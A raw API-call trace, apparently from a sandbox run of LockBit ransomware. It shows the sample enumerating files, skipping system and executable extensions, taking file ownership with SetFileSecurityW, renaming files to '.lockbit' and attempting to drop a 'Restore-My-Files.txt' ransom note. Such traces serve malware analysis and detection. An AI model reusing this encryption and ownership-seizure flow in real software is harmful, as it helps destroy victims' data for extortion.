lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0095.764] lstrcmpiW (lpString1=".", lpString2="InkObj.dll") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="InkObj.dll") returned -1 [0095.764] PathFindExtensionW (pszPath="InkObj.dll") returned=".dll" [0095.764] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0095.764] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0095.764] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0095.764] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0095.764] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0095.765] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0095.765] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0095.766] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0095.766] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0095.766] lstrcmpiW (lpString1=".", lpString2="InkWatson.exe") returned -1 [0095.766] lstrcmpiW (lpString1="..", lpString2="InkWatson.exe") returned -1 [0095.766] PathFindExtensionW (pszPath="InkWatson.exe") returned=".exe" [0095.766] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0095.766] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0095.766] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0095.766] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0095.766] lstrcmpiW (lpString1=".", lpString2="InputPersonalization.exe") returned -1 [0095.766] lstrcmpiW (lpString1="..", lpString2="InputPersonalization.exe") returned -1 [0095.766] PathFindExtensionW (pszPath="InputPersonalization.exe") returned=".exe" [0095.766] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0095.766] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0095.766] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0095.766] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0095.766] lstrcmpiW (lpString1=".", lpString2="ipscat.xml") returned -1 [0095.767] lstrcmpiW (lpString1="..", lpString2="ipscat.xml") returned -1 [0095.767] PathFindExtensionW (pszPath="ipscat.xml") returned=".xml" [0095.767] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0095.767] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0095.768] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0095.769] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0095.769] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipscat.xml") returned 1 [0095.769] lstrcmpiW (lpString1="ntldr", lpString2="ipscat.xml") returned 1 [0095.769] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipscat.xml") returned 1 [0095.769] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipscat.xml") returned -1 [0095.769] lstrcmpiW (lpString1="autorun.inf", lpString2="ipscat.xml") returned -1 [0095.769] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0095.769] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned=".xml" [0095.769] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0095.769] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0095.769] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0095.770] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0095.770] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.lockbit") returned 70 [0095.770] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0095.770] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.lockbit")) returned 0 [0095.771] GetLastError () returned 0x5 [0095.771] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0095.772] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0095.772] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.772] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0095.772] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0095.772] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3d0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0095.773] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0095.773] NtQueryInformationFile (in: FileHandle=0x3d0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0095.779] NtClose (Handle=0x3d0) returned 0x0 [0095.779] RtlFreeAnsiString (AnsiString="\\") [0095.779] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3d0) returned 1 [0095.780] malloc (_Size=0x200) returned 0x53fcc0 [0095.780] GetTokenInformation (in: TokenHandle=0x3d0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0095.780] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.780] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.780] CloseHandle (hObject=0x3d0) returned 1 [0095.780] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0095.780] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0095.781] free (_Block=0x53fcc0) [0095.781] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0095.781] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.lockbit")) returned 1 [0095.782] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3d0 [0095.782] CreateIoCompletionPort (FileHandle=0x3d0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0095.782] malloc (_Size=0x40068) returned 0x20ebde0 [0095.783] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x20ebdf8 | out: lpFileSize=0x20ebdf8*=2592) returned 1 [0095.783] ReadFile (in: hFile=0x3d0, lpBuffer=0x20ebe14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebde0 | out: lpBuffer=0x20ebe14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebde0) returned 1 [0095.786] GetLastError () returned 0x3e5 [0095.786] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0095.786] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0095.786] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.786] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0096.072] lstrcmpiW (lpString1=".", lpString2="ipschs.xml") returned -1 [0096.072] lstrcmpiW (lpString1="..", lpString2="ipschs.xml") returned -1 [0096.072] PathFindExtensionW (pszPath="ipschs.xml") returned=".xml" [0096.072] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.072] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.072] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.073] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.073] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.073] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0096.073] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.074] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.075] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.075] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.075] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipschs.xml") returned 1 [0096.075] lstrcmpiW (lpString1="ntldr", lpString2="ipschs.xml") returned 1 [0096.075] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipschs.xml") returned 1 [0096.075] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipschs.xml") returned -1 [0096.075] lstrcmpiW (lpString1="autorun.inf", lpString2="ipschs.xml") returned -1 [0096.075] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.076] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned=".xml" [0096.076] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.076] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.076] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.077] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.077] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.lockbit") returned 70 [0096.077] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.077] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.lockbit")) returned 0 [0096.077] GetLastError () returned 0x5 [0096.078] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.078] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.078] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.078] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.079] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.079] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3c0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.079] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0096.079] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0096.245] NtClose (Handle=0x3c0) returned 0x0 [0096.245] RtlFreeAnsiString (AnsiString="\\") [0096.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3c0) returned 1 [0096.245] malloc (_Size=0x200) returned 0x3981cc0 [0096.245] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: 